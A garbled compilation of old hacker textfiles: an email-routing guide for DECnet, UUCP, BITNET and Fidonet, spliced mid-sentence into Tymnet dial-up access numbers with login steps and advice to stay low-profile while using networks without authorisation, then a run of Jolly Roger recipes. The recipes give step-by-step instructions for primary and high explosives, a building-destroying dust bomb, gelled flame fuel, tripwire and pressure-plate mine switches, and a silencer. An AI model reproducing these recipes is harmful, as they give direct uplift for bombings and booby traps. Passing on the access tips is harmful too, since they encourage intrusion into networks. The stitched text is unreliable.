If your Ultrix system has only a DECNET link to Palo Alto, then you shouldaddress mail in much the same way that VMS users do, save that you shouldnotput the nm% in front of the address:
To: DECWRL::"strange!foreign!address"
Here are some typical outgoing mail addresses as used from an Ultrix systemthat has IP access. Ultrix systems without IP access should use the samesyntax as VMS users, except that the nm% at the front of the address shouldnotbe used.
To: "lll-winken!netsys!phrack"@decwrl.dec.com To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com
DETAILS OF USING OTHER NETWORKS

All of the world's computer networks are connected together, more or less,soit is hard to draw exact boundaries between them. Precisely where theInternetends and UUCP begins is a matter of interpretation.
For purposes of sending mail, though, it is convenient to divide thenetworkuniverse into these categories:
Easynet Digital's internal DECNET network. Characterized byaddresses of the form NODE::USER. Easynet can be used for commercial purposes.
Internet A collection of networks including the old ARPAnet, theNSFnet, the CSnet, and others. Most international research, development, and educational organizations are connected in some fashion to the Internet. Characterized by addressesof the form user@site.subdomain.domain. The Internet itself cannot be used for commercial purposes.
UUCP A very primitive network with no management, built with auto-dialers phoning one computer from another.Characterized by addresses of the form place1!place2!user. The UUCPnetwork can be used for commercial purposes provided that none ofthe sites through which the message is routed objects to that.
USENET Not a network at all, but a layer of software built on topof UUCP and Internet.
BITNET An IBM-based network linking primarily educational sites. Digital users can send to BITNET as if it were part of Internet, but BITNET users need special instructions for reversing the process. BITNET cannot be used forcommercial purposes.
Fidonet A network of personal computers. I am unsure of the statusof using Fidonet for commercial purposes, nor am I sure of its efficacy.
DOMAINS AND DOMAIN ADDRESSING
There is a particular network called "the Internet;" it is somewhat relatedtowhat used to be "the ARPAnet." The Internet style of addressing isflexibleenough that people use it for addressing other networks as well, with the
result that it is quite difficult to look at an address and tell just whatnetwork it is likely to traverse. But the phrase "Internet address" doesnotmean "mail address of some computer on the Internet" but rather "mailaddressin the style used by the Internet." Terminology is even further confusedbecause the word "address" means one thing to people who build networks andsomething entirely different to people who use them. In this file an"address"is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which iswhatnetwork engineers would call an "internet address").
The Internet naming scheme uses hierarchical domains, which despite theirtitleare just a bookkeeping trick. It doesn't really matter whether you sayNODE::USER or USER@NODE, but what happens when you connect two companies'networks together and they both have a node ANCHOR?? You must, somehow,specify which ANCHOR you mean. You could say ANCHOR.DEC::USER orDEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR. The Internetconvention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name(ANCHOR).
But there could be several different organizations named DEC. You couldhaveDigital Equipment Corporation or Down East College or Disabled EducationCommittee. The technique that the Internet scheme uses to resolveconflictslike this is to have hierarchical domains. A normal domain isn't DEC orSTANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational). Thesedomains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU. Thisdoesn't resolve conflicts completely, though: both Central MichiganUniversityand Carnegie-Mellon University could claim to be CMU.EDU. The rule is thattheowner of the EDU domain gets to decide, just as the owner of the CMU.EDUgetsto decide whether the Electrical Engineering department or the ElementaryEducation department gets subdomain EE.CMU.EDU.
The domain scheme, while not perfect, is completely extensible. If youhavetwo addresses that can potentially conflict, you can suffix some domain totheend of them, thereby making, say, decwrl.UUCP be somehow different fromDECWRL.ENET.
DECWRL's entire mail system is organized according to Internet domains, andinfact we handle all mail internally as if it were Internet mail. Incomingmailis converted into Internet mail, and then routed to the appropriate domain;ifthat domain requires some conversion, then the mail is converted to therequirements of the outbound domain as it passes through the gateway. Forexample, they put Easynet mail into the domain ENE STATEDENSITY ACCESS NUMBER NTWK ----- ------------------- -------------- ------ ------------
---- 03306 BERKELEY CALIFORNIA 300/1200 415-548-2121@PPS 06272 EL SEGUNDO CALIFORNIA 300/1200 213-640-8548@PPS 06272 FULLERTON CALIFORNIA 300/1200 714-441-2777@PPS 06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667@PPS 06272 LOS ANGELES(DOWNTOWN) CALIFORNIA 300/1200 213-687-3727@PPS 06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677@PPS 03306 MOUNTAIN VIEW CALIFORNIA 300/1200 415-960-3363@PPS 03306 OAKLAND CALIFORNIA 300/1200 415-893-9889@PPS 03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666@PPS 06272 PASADENA CALIFORNIA 300/1200 818-356-0780@PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-543-8275@PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-626-5380@PPS 03306 SAN FRANCISCO CALIFORNIA 300/1200 415-362-2280@PPS 03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888@PPS 06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844@PPS 06272 VAN NUYS CALIFORNIA 300/1200 818-780-1066@PPS
@PPS PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
(CONNECT MESSAGE)
. _. _. _<> (DOES NOT ECHO TO THE TERMINAL)
ONLINE 1200 WELCOME TO PPS: 415-XXX-XXXX 1 _3 _1 _0 _6 _9 _ (TYMNET ADDRESS) (DOES NOT ECHO UNTIL TYMNET RESPONDS)
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
SOUTHWESTERN BELL
NODE CITY STATE DENSITY ACCESS NUMBERSNWRK ----- -------------------- -------------- ------- ----------------- 05443 KANSAS CITY KANSAS 300/1200 316/225-9951@MRLK 05443 HAYS KANSAS 300/1200 913/625-8100
@MRLK 05443 HUTCHINSON KANSAS 300/1200 316/669-1052@MRLK 05443 LAWRENCE KANSAS 300/1200 913/841-5580@MRLK 05443 MANHATTAN KANSAS 300/1200 913/539-9291@MRLK 05443 PARSONS KANSAS 300/1200 316/421-0620@MRLK 05443 SALINA KANSAS 300/1200 913/825-4547@MRLK 05443 TOPEKA KANSAS 300/1200 913/235-1909@MRLK 05443 WICHITA KANSAS 300/1200 316/269-1996@MRLK
04766 BRIDGETON/ST. LOUIS MISSOURI 300/1200 314/622-0900@MRLK 04766 ST. LOUIS MISSOURI 300/1200 314/622-0900@MRLK
06510 ADA OKLAHOMA 300/1200 405/436-0252@MRLK 06510 ALTUS OKLAHOMA 300/1200 405/477-0321@MRLK 06510 ALVA OKLAHOMA 300/1200 405/327-1441@MRLK 06510 ARDMORE OKLAHOMA 300/1200 405/223-8086@MRLK 03167 BARTLESVILLE OKLAHOMA 300/1200 918/336-6901@MRLK 06510 CLINTON OKLAHOMA 300/1200 405/323-8102@MRLK 06510 DURANT OKLAHOMA 300/1200 405/924-2680@MRLK 06510 ENID OKLAHOMA 300/1200 405/242-8221@MRLK 06510 LAWTON OKLAHOMA 300/1200 405/248-8772@MRLK 03167 MCALESTER OKLAHOMA 300/1200 918/426-0900@MRLK 03167 MIAMI OKLAHOMA 300/1200 918/540-1551@MRLK 03167 MUSKOGEE OKLAHOMA 300/1200 918/683-1114@MRLK 06510 OKLAHOMA CITY OKLAHOMA 300/1200 405/236-0660@MRLK 06510 PONCA CITY OKLAHOMA 300/1200 405/762-9926@MRLK 03167 SALLISAW OKLAHOMA 300/1200 918/775-7713@MRLK 06510 SHAWNEE OKLAHOMA 300/1200 405/273-0053@MRLK 06510 STILLWATER OKLAHOMA 300/1200 405/377-5500@MRLK 03167 TULSA OKLAHOMA 300/1200 918/583-6606
@MRLK 06510 WOODWARD OKLAHOMA 300/1200 405/256-9947@MRLK

@MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)
(CONNECT MESSAGE) (PLEASE TYPE YOUR TERMINAL IDENTIFIER)
A _ (YOUR TERMINAL IDENTIFIER)
WELCOME TO MICROLINK II -XXXX:01-030- PLEASE LOG IN: .T <> _ (USERNAME TO ACCESS TYMNET)
HOST: CALL CONNECTED
-GWY 0XXXX- TYMNET: PLEASE LOG IN:
SOUTHERN NEW ENGLAND
NODE CITY STATE DENSITY ACCESS NUMBERS NWRK----- ------------------- ----------- ------- -------------- -----02727 BRIDGEPORT CONNECTICUT 300/2400 203/366-6972@CONNNET02727 BRISTOL CONNECTICUT 300/2400 203/589-5100@CONNNET02727 CANAAN CONNECTICUT 300/2400 203/824-5103@CONNNET02727 CLINTON CONNECTICUT 300/2400 203/669-4243@CONNNET02727 DANBURY CONNECTICUT 300/2400 203/743-2906@CONNNET02727 DANIELSON CONNECTICUT 300/2400 203/779-1880@CONNNET02727 HARTFORD/MIDDLETOWN CONNECTICUT 300/2400 203/724-6219@CONNNET02727 MERIDEN CONNECTICUT 300/2400 203/237-3460@CONNNET02727 NEW HAVEN CONNECTICUT 300/2400 203/776-1142@CONNNET02727 NEW LONDON CONNECTICUT 300/2400 203/443-0884@CONNNET02727 NEW MILFORD CONNECTICUT 300/2400 203/355-0764@CONNNET02727 NORWALK CONNECTICUT 300/2400 203/866-5305@CONNNET02727 OLD GREDDWICH CONNNETICUT 300/2400 203/637-8872@CONNNET02727 OLD SAYBROOK CONNECTICUT 300/2400 203/388-0778@CONNNET02727 SEYMOUR CONNECTICUT 300/2400 203/881-1455
@CONNNET02727 STAMFORD CONNECTICUT 300/2400 203/324-9701@CONNNET02727 STORRS CONNECTICUT 300/2400 203/429-4243@CONNNET02727 TORRINGTON CONNECTICUT 300/2400 203/482-9849@CONNNET02727 WATERBURY CONNECTICUT 300/2400 203/597-0064@CONNNET02727 WILLIMANTIC CONNECTICUT 300/2400 203/456-4552@CONNNET02727 WINDSOR CONNECTICUT 300/2400 203/688-9330@CONNNET02727 WINDSOR LCKS/ENFIELD CONNECTICUT 300/2400 203/623-9804@CONNNET

@CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET
(CONNECT MESSAGE)
H_ H_ <_> (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) CONNNET
._ T_ <_>_ (MUST BE CAPITAL LETTERS)
26-SEP-88 18:33 (DATA) 031069 (ADDRESS CONFIRMATION) COM (CONFIRMATION OF CALL SET-UP)
-GWY OXXXX-TYMNET: PLEASE LOG IN:
On a side note, the recent book The Cuckoo's Egg provides some interestinginformation (in the form of a story, however) on a Tymnet hacker. Rememberthat he was into BIG things, and hence he was cracked down upon. If youkeep alow profile, networks should provide a good access method.
If you can find a system that is connected to the Internet that you can getonfrom Tymnet, you are doing well.___________________________________________________________________________¼____
Silicon_Swindler@f5.n135.z1.ifna.org and, provided that yourmailerknows the .ifna.org domain, it should get through alright. Apparently, asofthe writing of this article, they have implemented a new gateway namecalledfidonet.org which should work in place of ifna.org in all routings. Ifyour
mailer does not know either of these domains, use the above routing butreplacethe first "@" with a "%" and then afterwards, use either of the followingmailers after the "@": CS.ORST.EDU or K9.CS.ORST.EDU (i.e. username%f.n.z.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU withK9.CS.ORST.EDU]).
The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) thatwasposted on INFONETS DIGEST which lists a number of FIDONET gateways:
Net Node Node Name~~~ ~~~~ ~~~~~~~~~104 56 milehi.ifna.org105 55 casper.ifna.org107 320 rubbs.ifna.org109 661 blkcat.ifna.org125 406 fidogate.ifna.org128 19 hipshk.ifna.org129 65 insight.ifna.org143 N/A fidogate.ifna.org152 200 castle.ifna.org161 N/A fidogate.ifna.org369 17 megasys.ifna.org
NOTE: The UUCP equivalent node name is the first part of the node name.In other words, the UUCP node milehi is listed as milehi.ifna.org butcan be mailed directly over the UUCP network.
Another way to mail to FIDONET, specifically for Internet people, is inthisformat:
ihnp4!necntc!ncoast!ohiont!!!user_name@husc6.harvard.edu
And for those UUCP mailing people out there, just use the path describedandignore the @husc5.harvard.edu portion. There is a FIDONET NODELISTavailable onmost any FIDONET bulletin board, but it is quite large.
ONTYME~~~~~~Previously known as Tymnet, OnTyme is the McDonnell Douglas revision.Afterthey bought out Tymnet, they renamed the company and opened an experimentalInternet gateway at ONTYME.TYMNET.COM but this is supposedly only good forcertain corporate addresses within McDonnell Douglas and Tymnet, not theircustomers. The userid format is xx.yyy or xx.y/yy where xx is a net nameandyyy (or y/yy) is a true username. If you cannot directly nail this, try:
xx.yyy%ONTYME.TYMSodium Chlorate by the Jolly Roger
Sodium Chlorate is a strong oxidizer used in the manufacture of
explosives. It can be used in place of Potassium Chlorate.
Material Required Sources----------------- -------
2 carbon or lead rods (1 in. diameter Dry Cell Batteriesby 5 in. long) (2-1/2 in. diameter by 7" long) or plumbing supply storeSalt, or ocean water Grocery store or oceanSulfuric acid, diluted Motor Vehicle BatteriesMotor VehicleWater2 wires, 16 gauge (3/64 in. diameter approx.), 6 ft. long, insulated.Gasoline1 gallon glass jar, wide mouth (5 in. diameter by 6 in. high approx.)SticksStringTeaspoonTraysCupHeavy clothKnifeLarge flat pan or tray
Procedure---------
1) Mix 1/2 cup of salt into the one gallon glass jar with 3 litres (3quarts) of water.2) Add 2 teaspoons of battery acid to the solution and stir vigorouslyfor 5 minutes.3) Strip about 4 inches of insulation from both ends of the two wires.4) With knife and sticks, shape 2 strips of wood 1 by 1/8 by 1-1/2. Tiethe wood strips to the lead or carbon rods so that they are 1-1/2 inclesapart.5) Connect the rods to the battery in a motor vehicle with the insulatedwire.6) Submerge 4-1/2 inches of the rods in the salt water solution.7) With gear in neutral position, start the vehicle engine. Depress theaccelerator approx. 1/5 of its full travel.8) Run the engine with the accelerator in this position for 2 hours, thenshut it down for 2 hours.9) Repeat this cycle for a total of 64 hours while maintaining the levelof the acid-salt water solution in the glass jar.
CAUTION: This arrangement employs voltages which can be quite dangerous!Do not touch bare wire leads while engine is running!!
10) Shut off the engine. Remove the rods from the glass jar anddisconnect wire leads from the battery.11) Filter the solution through the heavy cloth into a flat pan or tray,leaving the sediment at the bottom of the glass jar.12) Allow the water in the filtered solution to evaporate at roomtemperature (approx. 16 hours). The residue is approximately 60% or moresodium chlorate which is pure enough to be used as an explosiveingredient.
---------------Jolly Roger

Mercury Fulminate by the Jolly Roger
Mercury Fulminate is used as a primary explosive in the fabricationof detonators. It is to be used with a booster explosive such as picricacid or RDX (which are elsewhere in this Cookbook).
Material Required Source----------------- ------
Nitric Acid, 90% conc. (1.48 sp. gr) Elsewhere in this Cookbook, or in industrial metal processorsMercury Thermometers, mercury switches, old radio tubesEthyl (grain) alcohol (90%)Filtering material Paper towelsTeaspoon measure (1/4, 1/2. and 1 tsp. capacity)-aluminum, stainless steel or wax coatedHeat SourceClean wooden stickClean waterGlass containersTapeSyringe
Procedure:---------
1) Dilute 5 teaspoons of nitric acid with 2-1/2 teaspoons of clean waterin a glass container by adding the acid to the water.2) Dissolve 1/8 teaspoon of mercury in the diluted nitric acid. Thiswill yield dark red fumes. NOTE: It may be necessary to add water, ondrop at a time, to the mercury-acid solution in order to start areaction.
CAUTION: Acid will burn skin and destroy clothing. If any is spilled,wash it away with a large quantity of water. Do NOT inhale fumes!
3) Warm 10 teaspoons of the alcohol in a container until the alcoholfeels warm to the inside of the wrist.4) Pour the metal-acid solution into the warm alcohol. Reaction shouldstart in less than 5 minutes. Dense white fumes will be given off duringthe reaction. As time lapses, the fumes will become less dense. Allow 10to 15 minutes to complete reaction. Fulminate will settle to the bottom.
CAUTION: This reaction generates large quantities of toxic, flammablefumes. The process MUST be conducted outdoors or in a well-ventilatedarea, away from sparks or open flames. DO NOT inhale fumes!
5) Filter the solution through a paper towel into a container. Crystalsmay stick to the side of the container. If so, tilt and squirt water
down the sides of the container until all of the material collects onthe filter paper.6) Wash the crystals with 6 teaspoons of ethyl alcohol.7) Allow these mercury fulminate crystals to air dry.
CAUTION: Handle dry explosive with great care. Do not scrape or handleit roughly! Keep away from sparks or open flames. Store in a cool, dryplace.
----------------Jolly Roger

Improvised Black Powder by the Jolly Roger
Black powder can be prepared in a simple, safe manner. It may be usedasblasting or gun powder.
Material Required-----------------
Potassium Nitrate, granulated, 3 cups (3/4 liter)Wood charcoal, powdered, 2 cupsSulfur, powdered, 1/2 cupAlcohol, 5 pints (2-1/2 liters) (whiskey, rubbing alcohol, etc.)Water, 3 cups (3/4 liter)Heat source2 buckets - each 2 gallon (7-1/2 litres) capacity, at least one of which is heat resistant (metal, ceramic, etc.)Flat window screening, at least 1 foot (30 cm) squareLarge wooden stickCloth, at leat 2 feet (60 cm) square
Procedure:---------
1) Place alcohol in one of the buckets.2) Place potassium nitrate, charcoal, and sulfur in the heat resistantbucket. Add 1 cup water and mix thoroughly with wooden stick until allingrediants are dissolved.3) Add remaining water (2 cups) to mixture. Place bucket on heat source andstir until small bubbles begin to form.
CAUTION: DO NOT boil mixture. Be sure ALL mixture stays wet. If any is dry,as on sides of pan, it may ignite!
4) Remove bucket from heat and pour mixture into alcohol while stirringvigorously.5) Let alcohol mixture stand about 5 minutes. Strain mixture through clothtoobtain black powder. Discard liquid. Wrap cloth around black powder andsqueeze to remove all excess liquid.6) Place screening over dry bucket. Place workable amount of damp powder onscreen and granulate by rubbing solid through screen. NOTE: If granulatedparticles appear to stick together and change shape, recombine entire batchof powder and repeat steps 5 & 6.7) Spread granulated black powder on flat, dry surface so that layer about
1/2 inch (1-1/4 cm) is formed. Allow to dry. Use radiator, or directsunlight. This should be dried as soon as possible, preferably in an hour.The longer the drying period, the less effective the black powder.
CAUTION: Remove from heat AS SOON AS granules are dry. Black powder isnowready to use.
Nitric Acid by the Jolly Roger
Nitric Acid is used in the preparation of many explosives, incediarymixtures, and acid delay timers. It may be prepared by distilling a mixtureof potassium nitrate and concentrated sulfuric acid.
Material Required Sources----------------- -------Potassium Nitrate (2 parts by volume) Elsewhere in this Cookbook, or drug storeCONCENTRATED sulfuric acid (1 part by volume) Motor vehicle batteries Industrial plants2 bottles or ceramin jugs (narrow necks are preferable)Pot or frying panHeat source (wood, charcoal, or coal)Tape (paper, electrical, masking, but NOT cellophane!)Paper or rags
IMPORTANT: If sulfuric acid is obtained from a motor vehicle battery,concentrate it by boiling it UNTIL white fumes appear. DO NOT INHALE FUMES
NOTE: The amount of nitric acid produced is the same as the amount ofpotassium nitrate. Thus, for two tablespoons of nitric acid, use 2tablespoons of potassium nitrate and 1 tablespoonful of concentratedsulfuricacid.
Procedure:---------
1) Place dry potassium nitrate in bottle or jug. Add sulfuric acid. Do notfill the bottle more than 1/4 full. Mix until paste is formed.
CAUTION: DO NOT INHALE FUMES!
2) Wrap paper or rags around necks of two bottles. securly tape necks oftwobottles together. Be sure that bottles are flush against each other andthatthere are no air spaces.3) Support bottles on rocks or cans so that empty bottle is SLIGHTLY lowerthan bottle containing paste so that nitric acid that is formed inreceivingbottle will not run into other bottle.4) Build fire in pot or frying pan.5) Gently heat bottle containing mixture by gently moving fire in and out.Asred fumes begin to appear periodically pour cool water over empty receivingbottle. Nitric acid will begin to form in receiving bottle.
CAUTION: Do not overheat or wet bottle containing mixture or it mayshatter.As an added precaution, place bottle to be heated in heat resistantcontainerfilled with sand or gravel. Heat this outer container to produce nitricacid.
6) Continue the above process until no more red fumes are formed. If thenitric acid formed in the receiving bottle is not clear (cloudy) pour itintocleaned bottle and repeat steps 2-6.
CAUTION: Nitric acid should be set away from all combustables and should bekept in a SEALED CERAMIC OR GLASS container. DO NOT inhale fumes!
----------------Jolly Roger
Dust Bomb Instructions by the Jolly Roger
An initiator which will initiate common material to produce dustexplosions can be rapidly and easily constructed. This type of charge isideal for the destruction of enclosed areas such as rooms or buildings.
Material Required-----------------A flat can, 3 in. (8 cm) in diameter and 1-1/2 in. (3-3/4 cm) high. A 6- 1/2 ounce tuna can serves the purpose quite well.Blasting capExplosiveAluminum (may be wire, cut sheet, flattened can, or powder)Large nail, 4 in. (10 cm) longWooden rod - 1/4 in. (6 mm) diameterFlour, gasoline, and powder or chipped aluminum
NOTE: Plastic explosive produce better explosions than cast explosives.
Procedure:---------
1) Using the nail, press a hole through the side of the tuna can 3/8 inchto 1/2 inch (1 to 1-1/2 cm) from the bottom. Using a rotating and leveraction, enlarge the hole until it will accomodate the blasting cap.2) Place the wooden rod in the hole and position the end of the rod at thecenter of the can.3) Press explosive into the can, being sure to surround the rod, until itis 3/4 inch (2 cm) from the top of the can. Carefully remove the woodenrod.4) Place the aluminum metal on top of the explosive.5) Just before use, insert the blasting cap into the cavity made by therod. The initiator is now ready to use.
NOTE: If it is desired to carry the initiator some distance, cardboard maybe pressed on top of the aluminum to insure against loss of material.
How to Use:----------
This particular unit works quite well to initiate charges of fivepounds of flour, 1/2 gallon (1-2/3 litres) of gasoline, or two pounds offlake painters aluminum. The solid materials may merely be contained insacks or cardboard cartons. The gasoline may be placed in plastic coatedpaper milk cartons, as well as plastic or glass bottles. The charges areplaced directly on top of the initiator and the blasting cap is actuatedelectrically or by a fuse depending on the type of cap employed. this willdestroy a 2,000 cubic feet enclosure (building 10 x 20 x 10 feet).
Note: For larger enclosures, use proportionally larger initiators andcharges.
---------------Jolly Roger
Carbon-Tet Explosive by the Jolly Roger
A moist explosive mixture can be made from fine aluminum powdercombinedwith carbon tetrachloride or tetrachloroethylene. This explosive can bedetonated with a blasting cap.
Material Required Source----------------- ------Fine aluminum bronzing powder Paint storeCarbon Tetrachloride Pharmacy, or fire or extinguisher fluidtetrachloroethylene Dry cleaners, pharmacyStirring rod (wood)Mixing container (bowl, bucket, etc.)Measuring container (cup, tablespoon, etc.)Storage container (jar, can, etc.)Blasting capPipe, can or jar
Procedure:---------
1) Measure out two parts aluminum powder to one part carbon tetrachlorideortetrachlorethylene liquid into mixing container, adding liquid to powderwhile stirring with the wooden rod.2) Stir until the mixture becomes the consistency of honey syrup.
CAUTION: Fumes from the liquid are dangerous and should not be inhaled.
3) Store explosive in a jar or similar water proof container until ready touse. The liquid in the mixture evaporates quicky when not confined.
NOTE: Mixture will detonate in this manner for a period of 72 hours.
How to Use:----------
1) Pour this mixture into an iron or steel pipe which has an end capthreadedon one end. If a pipe is not available, you may use a dry tin can or glassjar.2) Insert blasting cap just beneath the surface of the explosive mix.
‡NOTE: Confining the open end of the container will add to the effectivenessof the explosive.
---------------Jolly Roger
Making Picric Acid from Aspirin by the Jolly Roger
Picric Acid can be used as a booster explosive in detonators, a highexplosive charge, or as an intermediate to preparing lead picrate.
Material Required-----------------Aspirin tablets (5 grains per tablet)Alcohol, 95% pureSulfuric acid, concentrated, (if battery acid, boil until white fumes disappear)Potassium Nitrate (see elsewhere in this Cookbook)WaterPaper towelsCanning jar, 1 pintRod (glass or wood)Glass containersCeramic or glass dishCupTeaspoonTablespoonPanHeat sourceTape
Procedure:---------
1) Crush 20 aspirin tablets in a glass container. Add 1 teaspoon of waterand work into a paste.2) Add approximately 1/3 to 1/2 cup of alcohol (100 millilitres) to theaspirin paste; stir while pouring.3) Filter the alcohol-aspirin solution through a paper towel into anotherglass container. Discard the solid left in the paper towel.4) Pour the filtered solution into a glass or ceramic dish.5) Evaporate the alcohol and water from the solution by placing the dishinto a pan of hot water. White powder will remain in the dish afterevaporation.
NOTE: The water in the pan should be at hot bath temperature, not boiling,approx. 160 to 180 degress farenheit. It should not burn the hands.
6) Pour 1/3 cup (80 millilitres) of concentrated sulfuric acid into acanning jar. Add the white powder to the sulfuric acid.7) Heat canning jar of sulfuric acid in a pan of simmering hot water bathfor 15 minutes; then remove jar from the bath. Solution will turn to ayellow-orange color.8) Add 3 level teaspoons (15 grams) of potassium nitrate in three portionsto the yellow-orange solution; stir vigorously during additions. Solutionwill turn red, then back to a yellow-orange color.9) Allow the solution to cool to ambient room temperature while stirringoccasionally.10) Slowly pour the solution, while stirring, into 1-1/4 cup (300
millilitres) of cold water and allow to cool.11) Filter the solution through a paper towel into a glass container. Lightyellow particles will collect on the paper towel.12) Wash the light yellow particles with 2 tablespoons (25 millilitres) ofwater. Discard the waste liquid in the container.13) Place articles in ceramic dish and set in a hot water bath, as in step5, for 2 hours.
--------------Jolly Roger
Reclamation of RDX from C-4 Explosives by the Jolly Roger
RDX can be obtained from C-4 explosives with the use of gasoline. Itcanbe used as a booster explosive for detonators or as a high explosivecharge.
Material Required-----------------GasolineC-4 explosive2 - pint glass jars, wide mouthPaper towelsStirring rod (glass or wood)WaterCeramic or glass dishPanHeat sourceTeaspoonCupTape
NOTE: Water, Ceramic or glass dish, pan, & heat source are all optional.TheRDX can be air dried instead.
Procedure:---------
1) Place 1-1/2 teaspoons (15 grams) of C-4 explosive in one of the pintjars.Add 1 cup (240 milliliters) of gasoline.
NOTE: These quantities can be increased to obtain more RDX. For example,use 2gallons of gasoline per 1 cup of C-4.
2) Knead and stir the C-4 with the rod until the C-4 has broken down intosmallparticles. Allow mixture to stand for 1/2 hour.3) Stir the mixture again until a fine white powder remains on the bottomofthe jar.4) Filter the mixture through a paper towel into the other glass jar. Washtheparticles collected on the paper towel with 1/2 cup (120 milliliters) ofgasoline. Discard the waste liquid.
5) Place the RDX particles in a glass or ceramic dish. Set the dish in apan ofhot water, not boiling and dry for a period of 1 hour.
NOTE: The RDX particles may be air dried for a period of 2 to 3 hours.
--------------Jolly Roger
Egg-based Gelled Flame Fuels by the Jolly Roger
The white of any bird egg can be used to gel gasoline for use as aflame fuel which will adhere to target surfaces.
Materials Required------------------
Parts byVolume Ingredient How used Common Source-------- ---------- -------- -------------
85 Gasoline Motor Fuel Gas Stations Stove Fuel Motor Vehicle Solvent
14 Egg Whites Food Food Store Industrial Farms Processes
Any one of the following:
1 Table Salt Food Sea Water Industrial Natural Brine Processes Food Store
3 Ground Coffee Food Coffee Plant Food Store
3 Dried Tea Leaves Food Tea Plant Food Store
3 Cocoa Food Cacao Tree Food Store
2 Sugar Sweetening Sugar Cane foods Food Store
1 Saltpeter Pyrotechnics Natural (Potassium Explosives Deposits Nitrate) Matches Drug Store Medicine
1 Epsom Salts Medicine Natural Mineral Water Kisserite Industrial Drug Store Processes Food Store
2 Washing Soda Washing Cleaner Food Store
(Sal Soda) Medicine Drug Store Photography Photo Supply Store
1 1/2 Baking Soda Baking Food Store Manufacturing Drug Store of: Beverages Medicines and Mineral Waters
1 1/2 Aspirin Medicine Drug Store Food Store
Procedure:---------
CAUTION: Make sure that ther are no open flames in the area when mixingflame fuels! NO SMOKING!!
1) Seperate the egg white from the yolk. This can be done by breaking theegg into a dish and carefully removing the yolk with a spoon.2) Pour egg white into a jar, bottle, or other container, and add gasoline.3) Add the salt (or other additive) to the mixture and stir occasionallyuntil gel forms (about 5 to 10 minutes).
NOTE: A thicker gelled flame fuel can be obtained by putting the capped jarin hot (65 degrees Centegrade) water for about 1/2 hour and then lettingthem cool to room temperature. (DO NOT HEAT THE GELLED FUEL CONTAININGCOFFEE!!)
----------------------Jolly Roger

Clothespin Switch by the Jolly Roger
A spring type clothespin is used to make a circuit closing switch toactuate explosive charges, mines, booby traps, and alarm systems.
Material Required:-----------------
Spring type clothespinSold copper wire -- 1/16 in. (2 mm) in diameterStrong string on wireFlat piece of wood (roughly 1/8 x 1" x 2")Knife
Procedure:---------
1) Strip four in. (10 cm) of insulation from the ends of 2 solid copperwires. Scrape the copper wires with pocket knife until the metal isshiny.2) Wind one scraped wire tightly on jaw of the clothespin, and the otherwire on the other jaw.
3) Make a hole in one end of the flat piece of wood using a knife, heatednail or drill.4) Tie strong string or wire through the hole.5) Place flat piece of wood between the jaws of the clothespin switch.
Basic Firing Circuit:--------------------
______________ ---------------------------\ initiator ----------\ strong -------------- twine \ _---------_________ --------- \clothespin \ / \ / switch \ / \ / \ / + - ---------- battery ----------
When the flat piece of wood is removed by pulling the string, thejaws of the clothespin will close, completing the circuit.
CAUTION: Do not attach the battery until the switch and trip wire havebeen emplaced and examined. Be sure that the flat piece of wood isseperating the jaws of the switch.
-----------------Jolly Roger
Flexible Plate Switch by the Jolly Roger
This flexible plate switch is used for initiating emplaced mines andexplosives.
Material Required:-----------------
Two flexible metal sheets one approximately 10 in. (25 cm) square one approximately 10 in. x 8 in. (20 cm)Piece of wood 10 in. square x 1 in. thickFour soft wood blocks 1 in. x 1 in. x 1/4 in.Eight flat head nails, 1 in. longConnecting wiresAdhesive tape
Procedure:---------
1) Nail 10 in. by 8 in. metal sheet to 10 in. square piece of wood so that
1 in. of wood shows on each side of the metal. Leave one of the nailssticking up about 1/4 in.2) Strip insulation from the end of one connecting wire. Wrap this endaround the nail and drive the nail all the way in.3) Place the four wood blocks on the corners of the wood base.4) Place the 10 in. square flexible metal sheet so that it rests on theblocks in line with the wood base.5) Drive four nails through the metal sheet and the blocks (1 per block)to fasten the sheet to the wood base. A second connecting wire is atachedto one of the nails as in step #2.6) Wrap the adhesive tape around the edges of the plate and wood base.This will assure that no dirt or other foreign matter will get between theplates and prevent the switch from operating.
How to use:----------
The switch is placed in a hole in the path of expected traffic and coveredwith a thin layer of dirt or other camouflaging material. The mine orother explosive device connected to the switch can be buried with theswitch or emplaced elsewhere as desired.
When a vehicle passes over the switch, the two metal plates make contactclosing the firing circuit.
----------------Jolly Roger
Low Signature Systems (Silencers) by the Jolly Roger
Low signature systems (silencers) for improvised small arms weaponscan be made from steel gas or water pipe and fittings.
Material Required:-----------------Grenade ContainerSteel pipe nipple, 6 in. (15 cm) long - (see table 1 for diameter)2 steel pipe couplings - (see table 2 for dimensions)Cotton cloth - (see table 2)DrillAbsorbent cotton
Procedure:---------1) Drill hole in grenade container at both ends to fit outside diameterof pipe nipple. (see table 1)
-> /----------------------\ / 2.75 in ) ( <-holes dia. \ -> \-----------------------/
----------------------- 5 in.
2) Drill four rows of holes in pipe nipple. Use table 1 for diameter andlocation of holes.
‡ (Note: I suck at ASCII art!)
6 in. ----------------------------------- _____________________________________ ___ O O O O O O O O O O O O O O O O O C (nom. dia.) ------------------------------------- (size of hole) \ / (space between) B (dia.) A
